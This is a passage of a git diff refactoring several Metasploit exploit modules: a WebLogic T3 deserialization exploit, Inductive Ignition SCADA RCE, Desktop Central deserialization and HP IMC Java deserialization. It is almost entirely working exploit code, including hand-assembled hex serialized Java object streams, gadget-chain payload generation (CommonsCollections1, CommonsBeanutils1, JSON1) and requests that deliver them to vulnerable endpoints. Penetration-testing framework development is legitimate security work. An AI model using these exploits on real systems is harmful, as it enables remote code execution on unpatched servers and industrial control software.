'2f52658157f4f9ed' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # remaining object header - payload << '72' # class header + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class + objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry + objdata << '73735461626c65456e747279' # (cont) + objdata << '2f52658157f4f9ed' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # remaining object header + objdata << '72' # class header - payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; - payload << '6563743b' # (cont) - payload << '90ce589f1073296c' # serialVersionUID - payload << '02' # SERIALIZABLE - payload << '0000' # fieldCount = 0 - payload << '7870' # remaining object header - payload << '77' # block header - payload << '020000' # contents = 0x0000 - payload << '78' # block footer + objdata << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; + objdata << '6563743b' # (cont) + objdata << '90ce589f1073296c' # serialVersionUID + objdata << '02' # SERIALIZABLE + objdata << '0000' # fieldCount = 0 + objdata << '7870' # remaining object header + objdata << '77' # block header + objdata << '020000' # contents = 0x0000 + objdata << '78' # block footer - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class - payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry - payload << '73735461626c65456e747279' # (cont) - payload << '2f52658157f4f9ed' # serialVersionUID - payload << '0c' # SERIALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # block footer - payload << '72' # class header - payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector - payload << 'd9977d5b803baf01' # serialVersionUID - payload << '03' # WRITE_METHOD | SERIALIZABLE - payload << '0003' # fieldCount = 3 - payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement - payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount - payload << '5b000b656c656d656e7444617461' # 2: Array: elementData - payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; - payload << '743b' # (cont) - payload << '7870' # remaining object header - payload << '77' # block header - payload << '020000' # contents = 0x0000 - payload << '78' # block footer + objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry + objdata << '73735461626c65456e747279' # (cont) + objdata << '2f52658157f4f9ed' # serialVersionUID + objdata << '0c' # SERIALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # block footer + objdata << '72' # class header + objdata << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector + objdata << 'd9977d5b803baf01' # serialVersionUID + objdata << '03' # WRITE_METHOD | SERIALIZABLE + objdata << '0003' # fieldCount = 3 + objdata << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement + objdata << '49000c656c656d656e74436f756e74' # 1: Int: elementCount + objdata << '5b000b656c656d656e7444617461' # 2: Array: elementData + objdata << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; + objdata << '743b' # (cont) + objdata << '7870' # remaining object header + objdata << '77' # block header + objdata << '020000' # contents = 0x0000 + objdata << '78' # block footer - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- - ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1",mycmd) - payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join + java_payload = generate_java_deserialization_for_payload('CommonsCollections1', payload) + objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join - payload << 'fe010000' # ----- separator ----- + objdata << 'fe010000' # ----- separator ----- # basic weblogic ImmutableServiceContext object (serialized) - payload << 'aced0005' # JSO v5 header - payload << '73' # object header - payload << '72' # class - payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext - payload << '7461626c6553657276696365436f6e74657874' # (cont) - payload << 'ddcba8706386f0ba' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '78' # object footer - payload << '72' # block header - payload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext - payload << '696465722e426173696353657276696365436f' # (cont) - payload << '6e74657874' # (cont) - payload << 'e4632236c5d4a71e' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # block footer - payload << '77' # block header - payload << '020600' # contents = 0x0600 - payload << '7372' # class descriptor - payload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor - payload << '726e616c2e4d6574686f644465736372697074' # (cont) - payload << '6f72' # (cont) - payload << '12485a828af7f67b' # serialVersionUID - payload << '0c' # EXTERNALIZABLE | BLOCKDATA - payload << '0000' # fieldCount = 0 - payload << '7870' # class footer - payload << '77' # class data + objdata << 'aced0005' # JSO v5 header + objdata << '73' # object header + objdata << '72' # class + objdata << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext + objdata << '7461626c6553657276696365436f6e74657874' # (cont) + objdata << 'ddcba8706386f0ba' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '78' # object footer + objdata << '72' # block header + objdata << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext + objdata << '696465722e426173696353657276696365436f' # (cont) + objdata << '6e74657874' # (cont) + objdata << 'e4632236c5d4a71e' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # block footer + objdata << '77' # block header + objdata << '020600' # contents = 0x0600 + objdata << '7372' # class descriptor + objdata << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor + objdata << '726e616c2e4d6574686f644465736372697074' # (cont) + objdata << '6f72' # (cont) + objdata << '12485a828af7f67b' # serialVersionUID + objdata << '0c' # EXTERNALIZABLE | BLOCKDATA + objdata << '0000' # fieldCount = 0 + objdata << '7870' # class footer + objdata << '77' # class data #payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765 #payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c #payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b - payload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized - payload << '78' # class footer - payload << '78' # block footer + objdata << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized + objdata << '78' # class footer + objdata << '78' # block footer # MISSING OBJECT FOOTER (0x78) - payload << 'fe00ff' # this cruft again. some kind of footer + objdata << 'fe00ff' # this cruft again. some kind of footer # sets the length of the stream - data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') - data << payload + data = ((objdata.length >> 1) + 4).to_s(16).rjust(8,'0') + data << objdata sock.put([data].pack('H*')) sleep(1) diff --git a/modules/exploits/multi/scada/inductive_ignition_rce.rb b/modules/exploits/multi/scada/inductive_ignition_rce.rb index fabb18c48e..d5e61afa04 100644 --- a/modules/exploits/multi/scada/inductive_ignition_rce.rb +++ b/modules/exploits/multi/scada/inductive_ignition_rce.rb @@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Powershell + include Msf::Exploit::JavaDeserialization def initialize(info = {}) super( @@ -185,17 +185,11 @@ class MetasploitModule < Msf::Exploit::Remote lib = 'CommonsBeanutils1' end - if my_target.name == 'Windows' - cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encode_final_payload: true }) - ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(lib, cmd, modified_type: 'cmd') - else - ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(lib, payload.encoded, modified_type: 'bash') - end - - ysoserial_payload = Rex::Text.encode_base64(ysoserial_payload) - ysoserial_payload = create_java_str(ysoserial_payload) - ysoserial_payload = Rex::Text.encode_base64(ysoserial_payload) - data += ysoserial_payload + java_payload = generate_java_deserialization_for_payload(lib, payload) + java_payload = Rex::Text.encode_base64(java_payload) + java_payload = create_java_str(java_payload) + java_payload = Rex::Text.encode_base64(java_payload) + data += java_payload data += ']]>enGB' diff --git a/modules/exploits/windows/http/desktopcentral_deserialization.rb b/modules/exploits/windows/http/desktopcentral_deserialization.rb index 8a42b3e70a..21858a77f8 100644 --- a/modules/exploits/windows/http/desktopcentral_deserialization.rb +++ b/modules/exploits/windows/http/desktopcentral_deserialization.rb @@ -10,8 +10,8 @@ class MetasploitModule < Msf::Exploit::Remote prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager - include Msf::Exploit::Powershell include Msf::Exploit::FileDropper + include Msf::Exploit::JavaDeserialization def initialize(info = {}) super( @@ -148,22 +148,20 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, _opts = {}) - # XXX: An executable is required to run arbitrary commands - cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper - vprint_status("Executing command: #{cmd}") # I identified mr_me's binary blob as the CommonsBeanutils1 payload :) - serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( + java_payload = generate_java_deserialization_for_command( 'CommonsBeanutils1', + 'cmd', cmd ) # XXX: Patch in expected serialVersionUID - serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e" + java_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e" # Rock 'n' roll! - upload_serialized_payload(serialized_payload) + upload_serialized_payload(java_payload) deserialize_payload end diff --git a/modules/exploits/windows/http/hp_imc_java_deserialize.rb b/modules/exploits/windows/http/hp_imc_java_deserialize.rb index 8d391cf962..444f001d74 100644 --- a/modules/exploits/windows/http/hp_imc_java_deserialize.rb +++ b/modules/exploits/windows/http/hp_imc_java_deserialize.rb @@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Powershell + include Msf::Exploit::JavaDeserialization def initialize(info={}) super(update_info(info, @@ -97,14 +97,13 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true}) - data = ::Msf::Util::JavaDeserialization.ysoserial_payload("JSON1",cmd) + java_payload = generate_java_deserialization_for_payload('JSON1', payload) - print_status "Sending serialized Java object (#{data.length} bytes)..." + print_status "Sending serialized Java object (#{java_payload.length} bytes)..." res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'topo', 'WebDMDebugServlet'), - 'data' => data + 'data' => java_payload }) end end